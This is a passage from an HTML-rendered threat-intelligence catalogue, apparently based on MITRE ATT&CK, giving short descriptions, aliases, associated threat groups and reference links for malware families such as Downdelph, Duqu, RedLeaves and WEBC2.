<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 984. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0047">https://attack.mitre.org/wiki/Software/S0047</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/">http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_httpclient_s0068"><a class="anchor" href="#_httpclient_s0068"></a><a class="link" href="#_httpclient_s0068">httpclient - S0068</a></h3>
<div class="paragraph">
<p>httpclient is malware used by Putter Panda. It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)</p>
</div>
<div class="paragraph">
<p>Aliases: httpclient</p>
</div>
<div class="paragraph">
<p>httpclient - S0068 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>httpclient</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 985. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0068">https://attack.mitre.org/wiki/Software/S0068</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_downdelph_s0134"><a class="anchor" href="#_downdelph_s0134"></a><a class="link" href="#_downdelph_s0134">Downdelph - S0134</a></h3>
<div class="paragraph">
<p>Downdelph is a first-stage downloader written in Delphi that has been used by APT28 in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)</p>
</div>
<div class="paragraph">
<p>Aliases: Downdelph, Delphacy</p>
</div>
<div class="paragraph">
<p>Downdelph - S0134 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Downdelph</p>
</li>
<li>
<p>Delphacy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 986. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0134">https://attack.mitre.org/wiki/Software/S0134</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_streamex_s0142"><a class="anchor" href="#_streamex_s0142"></a><a class="link" href="#_streamex_s0142">StreamEx - S0142</a></h3>
<div class="paragraph">
<p>StreamEx is a malware family that has been used by Deep Panda since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: StreamEx</p>
</div>
<div class="paragraph">
<p>StreamEx - S0142 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>StreamEx</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 987. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0142">https://attack.mitre.org/wiki/Software/S0142</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar">https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_psylo_s0078"><a class="anchor" href="#_psylo_s0078"></a><a class="link" href="#_psylo_s0078">Psylo - S0078</a></h3>
<div class="paragraph">
<p>Psylo is a shellcode-based Trojan that has been used by Scarlet Mimic. It has similar characteristics as FakeM. (Citation: Scarlet Mimic Jan 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: Psylo</p>
</div>
<div class="paragraph">
<p>Psylo - S0078 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Psylo</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 988. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0078">https://attack.mitre.org/wiki/Software/S0078</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hdoor_s0061"><a class="anchor" href="#_hdoor_s0061"></a><a class="link" href="#_hdoor_s0061">HDoor - S0061</a></h3>
<div class="paragraph">
<p>HDoor is malware that has been customized and used by the Naikon group. (Citation: Baumgartner Naikon 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: HDoor, Custom HDoor</p>
</div>
<div class="paragraph">
<p>HDoor - S0061 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HDoor</p>
</li>
<li>
<p>Custom HDoor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 989. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0061">https://attack.mitre.org/wiki/Software/S0061</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf">https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_janicab_s0163"><a class="anchor" href="#_janicab_s0163"></a><a class="link" href="#_janicab_s0163">Janicab - S0163</a></h3>
<div class="literalblock">
<div class="content">
<pre>(Citation: Janicab) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)</pre>
</div>
</div>
<div class="paragraph">
<p>Aliases: (Citation: Janicab)</p>
</div>
<div class="paragraph">
<p>Janicab - S0163 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Janicab</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 990. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0163">https://attack.mitre.org/wiki/Software/S0163</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.thesafemac.com/new-signed-malware-called-janicab/">http://www.thesafemac.com/new-signed-malware-called-janicab/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windshield_s0155"><a class="anchor" href="#_windshield_s0155"></a><a class="link" href="#_windshield_s0155">WINDSHIELD - S0155</a></h3>
<div class="paragraph">
<p>WINDSHIELD is a signature backdoor used by APT32. (Citation: FireEye APT32 May 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: WINDSHIELD</p>
</div>
<div class="paragraph">
<p>WINDSHIELD - S0155 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>WINDSHIELD</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 991. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0155">https://attack.mitre.org/wiki/Software/S0155</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tinyzbot_s0004"><a class="anchor" href="#_tinyzbot_s0004"></a><a class="link" href="#_tinyzbot_s0004">TinyZBot - S0004</a></h3>
<div class="paragraph">
<p>TinyZBot is a bot written in C# that was developed by Cleaver. (Citation: Cylance Cleaver)</p>
</div>
<div class="paragraph">
<p>Aliases: TinyZBot</p>
</div>
<div class="paragraph">
<p>TinyZBot - S0004 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TinyZBot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 992. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0004">https://attack.mitre.org/wiki/Software/S0004</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance%20Operation%20Cleaver%20Report.pdf">https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance%20Operation%20Cleaver%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backspace_s0031"><a class="anchor" href="#_backspace_s0031"></a><a class="link" href="#_backspace_s0031">BACKSPACE - S0031</a></h3>
<div class="paragraph">
<p>BACKSPACE is a backdoor used by APT30 that dates back to at least 2005. (Citation: FireEye APT30)</p>
</div>
<div class="paragraph">
<p>Aliases: BACKSPACE, Lecna</p>
</div>
<div class="paragraph">
<p>BACKSPACE - S0031 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BACKSPACE</p>
</li>
<li>
<p>Lecna</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 993. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0031">https://attack.mitre.org/wiki/Software/S0031</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pinchduke_s0048"><a class="anchor" href="#_pinchduke_s0048"></a><a class="link" href="#_pinchduke_s0048">PinchDuke - S0048</a></h3>
<div class="paragraph">
<p>PinchDuke is malware that was used by APT29 from 2008 to 2010. (Citation: F-Secure The Dukes)</p>
</div>
<div class="paragraph">
<p>Aliases: PinchDuke</p>
</div>
<div class="paragraph">
<p>PinchDuke - S0048 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PinchDuke</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 994. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0048">https://attack.mitre.org/wiki/Software/S0048</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cloudduke_s0054"><a class="anchor" href="#_cloudduke_s0054"></a><a class="link" href="#_cloudduke_s0054">CloudDuke - S0054</a></h3>
<div class="paragraph">
<p>CloudDuke is malware that was used by APT29 in 2015. (Citation: F-Secure The Dukes) (Citation: Securelist Minidionis July 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: CloudDuke, MiniDionis, CloudLook</p>
</div>
<div class="paragraph">
<p>CloudDuke - S0054 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CloudDuke</p>
</li>
<li>
<p>MiniDionis</p>
</li>
<li>
<p>CloudLook</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 995. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0054">https://attack.mitre.org/wiki/Software/S0054</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/">https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153"><a class="anchor" href="#_redleaves_s0153"></a><a class="link" href="#_redleaves_s0153">RedLeaves - S0153</a></h3>
<div class="paragraph">
<p>RedLeaves is a malware family used by menuPass. The code overlaps with PlugX and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: RedLeaves, BUGJUICE</p>
</div>
<div class="paragraph">
<p>RedLeaves - S0153 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RedLeaves</p>
</li>
<li>
<p>BUGJUICE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 996. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0153">https://attack.mitre.org/wiki/Software/S0153</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf">https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winmm_s0059"><a class="anchor" href="#_winmm_s0059"></a><a class="link" href="#_winmm_s0059">WinMM - S0059</a></h3>
<div class="paragraph">
<p>WinMM is a full-featured, simple backdoor used by Naikon. (Citation: Baumgartner Naikon 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: WinMM</p>
</div>
<div class="paragraph">
<p>WinMM - S0059 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>WinMM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 997. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0059">https://attack.mitre.org/wiki/Software/S0059</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf">https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobileorder_s0079"><a class="anchor" href="#_mobileorder_s0079"></a><a class="link" href="#_mobileorder_s0079">MobileOrder - S0079</a></h3>
<div class="paragraph">
<p>MobileOrder is a Trojan intended to compromise Android mobile devices. It has been used by Scarlet Mimic. (Citation: Scarlet Mimic Jan 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: MobileOrder</p>
</div>
<div class="paragraph">
<p>MobileOrder - S0079 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>MobileOrder</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 998. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0079">https://attack.mitre.org/wiki/Software/S0079</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sys10_s0060"><a class="anchor" href="#_sys10_s0060"></a><a class="link" href="#_sys10_s0060">Sys10 - S0060</a></h3>
<div class="paragraph">
<p>Sys10 is a backdoor that was used throughout 2013 by Naikon. (Citation: Baumgartner Naikon 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: Sys10</p>
</div>
<div class="paragraph">
<p>Sys10 - S0060 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sys10</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 999. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0060">https://attack.mitre.org/wiki/Software/S0060</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf">https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_duqu_s0038"><a class="anchor" href="#_duqu_s0038"></a><a class="link" href="#_duqu_s0038">Duqu - S0038</a></h3>
<div class="paragraph">
<p>Duqu is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)</p>
</div>
<div class="paragraph">
<p>Aliases: Duqu</p>
</div>
<div class="paragraph">
<p>Duqu - S0038 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Duqu</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1000. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0038">https://attack.mitre.org/wiki/Software/S0038</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20duqu%20the%20precursor%20to%20the%20next%20stuxnet.pdf">https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20duqu%20the%20precursor%20to%20the%20next%20stuxnet.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakem_s0076"><a class="anchor" href="#_fakem_s0076"></a><a class="link" href="#_fakem_s0076">FakeM - S0076</a></h3>
<div class="paragraph">
<p>FakeM is a shellcode-based Windows backdoor that has been used by Scarlet Mimic. (Citation: Scarlet Mimic Jan 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: FakeM</p>
</div>
<div class="paragraph">
<p>FakeM - S0076 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FakeM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1001. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0076">https://attack.mitre.org/wiki/Software/S0076</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shipshape_s0028"><a class="anchor" href="#_shipshape_s0028"></a><a class="link" href="#_shipshape_s0028">SHIPSHAPE - S0028</a></h3>
<div class="paragraph">
<p>SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)</p>
</div>
<div class="paragraph">
<p>Aliases: SHIPSHAPE</p>
</div>
<div class="paragraph">
<p>SHIPSHAPE - S0028 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SHIPSHAPE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1002. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0028">https://attack.mitre.org/wiki/Software/S0028</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_t9000_s0098"><a class="anchor" href="#_t9000_s0098"></a><a class="link" href="#_t9000_s0098">T9000 - S0098</a></h3>
<div class="paragraph">
<p>T9000 is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: T9000</p>
</div>
<div class="paragraph">
<p>T9000 - S0098 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>T9000</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1003. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0098">https://attack.mitre.org/wiki/Software/S0098</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html">https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/">http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_evilgrab_s0152"><a class="anchor" href="#_evilgrab_s0152"></a><a class="link" href="#_evilgrab_s0152">EvilGrab - S0152</a></h3>
<div class="paragraph">
<p>EvilGrab is a malware family with common reconnaissance capabilities. It has been deployed by menuPass via malicious Microsoft Office documents as part of spearphishing campaigns. (Citation: PWC Cloud Hopper Technical Annex April 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: EvilGrab</p>
</div>
<div class="paragraph">
<p>EvilGrab - S0152 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>EvilGrab</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1004. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0152">https://attack.mitre.org/wiki/Software/S0152</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf">https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bs2005_s0014"><a class="anchor" href="#_bs2005_s0014"></a><a class="link" href="#_bs2005_s0014">BS2005 - S0014</a></h3>
<div class="paragraph">
<p>BS2005 is malware that was used by Ke3chang in spearphishing campaigns since at least 2011. (Citation: Villeneuve et al 2014)</p>
</div>
<div class="paragraph">
<p>Aliases: BS2005</p>
</div>
<div class="paragraph">
<p>BS2005 - S0014 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BS2005</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1005. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0014">https://attack.mitre.org/wiki/Software/S0014</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_s0109"><a class="anchor" href="#_webc2_s0109"></a><a class="link" href="#_webc2_s0109">WEBC2 - S0109</a></h3>
<div class="paragraph">
<p>WEBC2 is a backdoor used by APT1 to retrieve a Web page from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)</p>
</div>
<div class="paragraph">
<p>Aliases: WEBC2</p>
</div>
<div class="paragraph">
<p>WEBC2 - S0109 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>WEBC2</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1006. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0109">https://attack.mitre.org/wiki/Software/S0109</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_plugx_s0013"><a class="anchor" href="#_plugx_s0013"></a><a class="link" href="#_plugx_s0013">PlugX - S0013</a></h3>
